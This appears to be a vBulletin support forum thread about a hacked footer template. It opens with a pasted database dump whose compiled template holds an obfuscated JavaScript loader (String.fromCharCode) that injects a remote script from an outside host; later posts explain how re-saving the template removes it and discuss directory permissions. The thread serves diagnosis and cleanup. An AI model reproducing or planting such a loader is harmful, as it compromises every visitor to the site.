Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'),(20304, -1'footer''$final_rendered = '''' . ''''; if (!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])) {\n                    $final_rendered .= ''\r\n<div style="clear: '' . vB_Template_Runtime::fetchStylevar("left") . ''">\r\n  '' . $ad_location[''ad_footer_start''] . ''\r\n  '' . $ad_location[''global_above_footer''] . ''\r\n</div>\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="'' . vB_Template_Runtime::linkBuild("forumhome|nosession") . ''" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        '' . ''''; if ($show[''quickchooser'']) {\n                    $final_rendered .= ''\r\n            <select name="styleid" onchange="switch_id(this, \\''style\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_style_chooser") . ''">\r\n                    '' . $quickchooserbits . ''\r\n                </optgroup>\r\n            </select>    \r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        \r\n        '' . ''''; if ($show[''languagechooser'']) {\n                    $final_rendered .= ''\r\n            <select name="langid" onchange="switch_id(this, \\''lang\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_language_chooser") . ''">\r\n                    '' . $languagechooserbits . ''\r\n                </optgroup>\r\n            </select>\r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        '' . ''''; if ($show[''contactus'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''contactuslink''] . ''" rel="nofollow" accesskey="9">'' . vB_Template_Runtime::parsePhrase("contact_us") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''hometitle'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''homeurl''] . ''">'' . $vboptions[''hometitle''] . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($show[''admincplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $admincpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("admin") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($show[''modcplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $modcpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("mod") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''archiveenabled'']) {\n                    $final_rendered .= ''<li><a href="archive/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("archive") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . $template_hook[''footer_links''] . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''privacyurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''privacyurl''] . ''">'' . vB_Template_Runtime::parsePhrase("privacy_statement") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''tosurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''tosurl''] . ''">'' . vB_Template_Runtime::parsePhrase("terms_of_service") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        <li><a href="'' . $relpath . ''#top" onclick="document.location.hash=\\''top\\''; return false;">'' . vB_Template_Runtime::parsePhrase("top") . ''</a></li>\r\n    </ul>\r\n    \r\n    \r\n    '' . ''''; if ($show[''dst_correction'']) {\n                    $final_rendered .= ''\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="'' . $session[''sessionhash''] . ''" />\r\n            <input type="hidden" name="securitytoken" value="'' . $bbuserinfo[''securitytoken''] . ''" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = '' . $bbuserinfo[''timezoneoffset''] . '' + '' . $bbuserinfo[''dstonoff''] . '';\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();\r\n    //-->\r\n    </script>\r\n        '' . $template_hook[''footer_javascript''] . ''\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">'' . vB_Template_Runtime::parsePhrase("all_times_are_gmt_x_time_now_is_y") . ''</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    '' . vB_Template_Runtime::parsePhrase("powered_by_vbulletin") . ''\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $cronimage . ''\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $vboptions[''copyrighttext''] . ''\r\n</div>\r\n'' . $ad_location[''ad_footer_end''] . '' \r\n'' . ''''; if ($GLOBALS[''vbulletin'']->options[''enablefacebookconnect'']) {\n                    $final_rendered .= ''\r\n    '' . $facebook_footer . ''\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n</div>'';''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'); 
                              MusicaDigitale.net - Italian Biggest Computer Music Board

                                Comment

                                • Jacqueline
                                  Member
                                  • Mar 2005
                                  • 70
                                  • 3.7.x
                                  #9
                                  I saw the same issue. Creating a new template got rid of it. This also got me all the latest vbulletin template customizations. I just had to go in and tweak my header and footer, and reset the stylevar for my custom logo. So the site itself is fine, but that code is still hidden somewhere. I have searched the template, the database, and copied all files from the site to a local machine and searched for the hacked code - cannot find it anywhere.
                                  ~ Jacqueline

                                  Baby Talk Zone

                                    Comment

                                    • Lynne
                                      Former vBulletin Support
                                      • Oct 2004
                                      • 26255
                                      #10
                                      The hackers usually enter it into the 'template' field. The field that gets dumped to the xml file, and the field that you are shown to edit, is the 'template_un' field (the unrendered version of the template). So, saving the template ('template_un') will actually write over the contents of the 'template' field and fix the issue.
                                      Please don't PM or VM me for support - I only help out in the threads.
                                      vBulletin Manual & vBulletin 4.0 Code Documentation (API)
                                      Want help modifying your vbulletin forum? Head on over to vbulletin.org
                                      If I post CSS and you don't know where it goes, throw it into the additional.css template.
                                      W3Schools &lt;- awesome site for html/css help

                                        Comment

                                        • Jacqueline
                                          Member
                                          • Mar 2005
                                          • 70
                                          • 3.7.x
                                          #11
                                          Thank you, thank you! I opened the footer and saved. That got rid of the hack code. While I'm staying on the new template, I feel better with the bad code outta there.
                                          ~ Jacqueline

                                          Baby Talk Zone

                                            Comment

                                            • Joey805
                                              Senior Member
                                              • Jan 2004
                                              • 183
                                              #12
                                              My site is also hacked with the same code. How did they get it and what is the best way to clean this up as well as prevent it from happening again?

                                                Comment

                                                • Ace
                                                  Senior Member
                                                  • Apr 2004
                                                  • 4051
                                                  • 4.2.X
                                                  #13
                                                  Originally posted by Joey805
                                                  My site is also hacked with the same code. How did they get it and what is the best way to clean this up as well as prevent it from happening again?
                                                  They could have gotten in from several ways. Do you happen to have 0777 directories? Like: customavatars etc?

                                                  Have you made sure those directories are protected by .htaccess so people can't upload a dodgy file disguised as a non-dodgy one?

                                                  Have you followed all of the suggestions made here? https://www.vbulletin.com/forum/entr...orums-(Part-1)
                                                  My Live vB5 Site - NZEating.com
                                                  vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                                                    Comment

                                                    • Joey805
                                                      Senior Member
                                                      • Jan 2004
                                                      • 183
                                                      #14
                                                      Originally posted by Ace
                                                      They could have gotten in from several ways. Do you happen to have 0777 directories? Like: customavatars etc?

                                                      Have you made sure those directories are protected by .htaccess so people can't upload a dodgy file disguised as a non-dodgy one?

                                                      Have you followed all of the suggestions made here? https://www.vbulletin.com/forum/entry.php/2503-Securing-your-vBulletin-Forums-(Part-1)
                                                      Yes I have 777 directories for my avatars and attachements since they are stores in the file system. How do I properly secure these?

                                                        Comment

                                                        • stonepilot
                                                          Senior Member
                                                          • Apr 2006
                                                          • 195
                                                          • 4.1.x
                                                          #15
                                                          I hear people saying not to have 777 directories like the customavatar, etc. What are they supposed to be? 755?
                                                          sigpic
                                                          Life is just a Big Skid

                                                            Comment

                                                            Previous 1 2 template Next
                                                            widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                                            Working...